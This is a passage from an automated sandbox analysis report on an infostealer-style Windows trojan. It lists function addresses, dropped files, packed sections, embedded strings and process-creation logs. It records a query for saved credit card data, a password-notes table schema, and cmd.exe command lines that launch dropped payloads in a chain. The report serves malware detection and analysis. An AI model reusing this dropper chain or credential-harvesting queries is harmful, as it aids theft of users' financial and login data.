Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C6E63 0_2_6C5C6E63
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C597E10 0_2_6C597E10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A5600 0_2_6C5A5600
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B9E30 0_2_6C5B9E30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C55BEF0 0_2_6C55BEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C56FEF0 0_2_6C56FEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C76E3 0_2_6C5C76E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C575E90 0_2_6C575E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BE680 0_2_6C5BE680
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B4EA0 0_2_6C5B4EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C597710 0_2_6C597710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C569F00 0_2_6C569F00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C586FF0 0_2_6C586FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C55DFE0 0_2_6C55DFE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A77A0 0_2_6C5A77A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C578850 0_2_6C578850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C57D850 0_2_6C57D850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C59F070 0_2_6C59F070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C567810 0_2_6C567810
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C59B820 0_2_6C59B820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A4820 0_2_6C5A4820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C50C7 0_2_6C5C50C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C57C0E0 0_2_6C57C0E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5958E0 0_2_6C5958E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5860A0 0_2_6C5860A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C57A940 0_2_6C57A940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5AB970 0_2_6C5AB970
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CB170 0_2_6C5CB170
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C56D960 0_2_6C56D960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C595190 0_2_6C595190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B2990 0_2_6C5B2990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C58D9B0 0_2_6C58D9B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C55C9A0 0_2_6C55C9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C599A60 0_2_6C599A60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C598AC0 0_2_6C598AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C571AF0 0_2_6C571AF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C59E2F0 0_2_6C59E2F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CBA90 0_2_6C5CBA90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C56CAB0 0_2_6C56CAB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C2AB0 0_2_6C5C2AB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5522A0 0_2_6C5522A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C584AA0 0_2_6C584AA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C555340 0_2_6C555340
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C56C370 0_2_6C56C370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C59D320 0_2_6C59D320
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C53C8 0_2_6C5C53C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C55F380 0_2_6C55F380
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_0064E410 13_2_0064E410
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_00683048 13_2_00683048
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_00644CD0 13_2_00644CD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_00677D63 13_2_00677D63
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_0068763B 13_2_0068763B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_00686EE9 13_2_00686EE9
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_00644AD0 13_2_00644AD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_0068775B 13_2_0068775B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_00688700 13_2_00688700
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_00682BB0 13_2_00682BB0
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED50000 14_2_7ED50000
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED5080C 14_2_7ED5080C
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C58CBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C5994D0 appears 90 times
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000002.2450878675.0000000001C4A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCm vs file.exe
Source: file.exe, 00000000.00000002.2482389473.000000006C5E2000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2482675409.000000006C7D5000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000003.2449039751.0000000001C4A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCm vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9995712652439024
Source: file.exe Static PE information: Section: ZLIB complexity 0.9920654296875
Source: file.exe Static PE information: Section: ZLIB complexity 0.9898681640625
Source: amadka[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9983083589480874
Source: amadka[1].exe.0.dr Static PE information: Section: aosuufqe ZLIB complexity 0.9944158700796274
Source: CFBAKEHIEB.exe.0.dr Static PE information: Section: ZLIB complexity 0.9983083589480874
Source: CFBAKEHIEB.exe.0.dr Static PE information: Section: aosuufqe ZLIB complexity 0.9944158700796274
Source: explorti.exe.7.dr Static PE information: Section: ZLIB complexity 0.9983083589480874
Source: explorti.exe.7.dr Static PE information: Section: aosuufqe ZLIB complexity 0.9944158700796274
Source: random[1].exe.13.dr Static PE information: Section: ZLIB complexity 0.9995712652439024
Source: random[1].exe.13.dr Static PE information: Section: ZLIB complexity 0.9920654296875
Source: random[1].exe.13.dr Static PE information: Section: ZLIB complexity 0.9898681640625
Source: 0244247334.exe.13.dr Static PE information: Section: ZLIB complexity 0.9995712652439024
Source: 0244247334.exe.13.dr Static PE information: Section: ZLIB complexity 0.9920654296875
Source: 0244247334.exe.13.dr Static PE information: Section: ZLIB complexity 0.9898681640625
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@50/68@8/8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C5B7030
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1772:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4612:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2481986032.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2467277602.000000001D3AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2482604755.000000006C78F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2481986032.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2467277602.000000001D3AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2482604755.000000006C78F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2481986032.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2467277602.000000001D3AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2482604755.000000006C78F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2481986032.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2467277602.000000001D3AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2482604755.000000006C78F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.2481986032.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2467277602.000000001D3AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2482604755.000000006C78F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2481986032.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2467277602.000000001D3AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2481986032.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2467277602.000000001D3AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2482604755.000000006C78F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.2450878675.0000000001AE5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.2342061911.0000000023481000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2322457634.0000000001B51000.00000004.00000020.00020000.00000000.sdmp, BFBGHDGCFHIDBGDGIIIE.0.dr, GHDBKFHIJKJKECAAAECA.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2481986032.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2467277602.000000001D3AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2481986032.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2467277602.000000001D3AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: file.exe ReversingLabs: Detection: 47%
Source: CFBAKEHIEB.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\DAFHIDGIJK.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe "C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe"
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe "C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe"
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe "C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe"
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1920,i,10516001789053394369,8976321614446210453,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5504 --field-trial-handle=1920,i,10516001789053394369,8976321614446210453,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5536 --field-trial-handle=1920,i,10516001789053394369,8976321614446210453,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\DAFHIDGIJK.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe "C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe "C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe "C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1920,i,10516001789053394369,8976321614446210453,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5504 --field-trial-handle=1920,i,10516001789053394369,8976321614446210453,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5536 --field-trial-handle=1920,i,10516001789053394369,8976321614446210453,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: slc.dll Jump to behavior
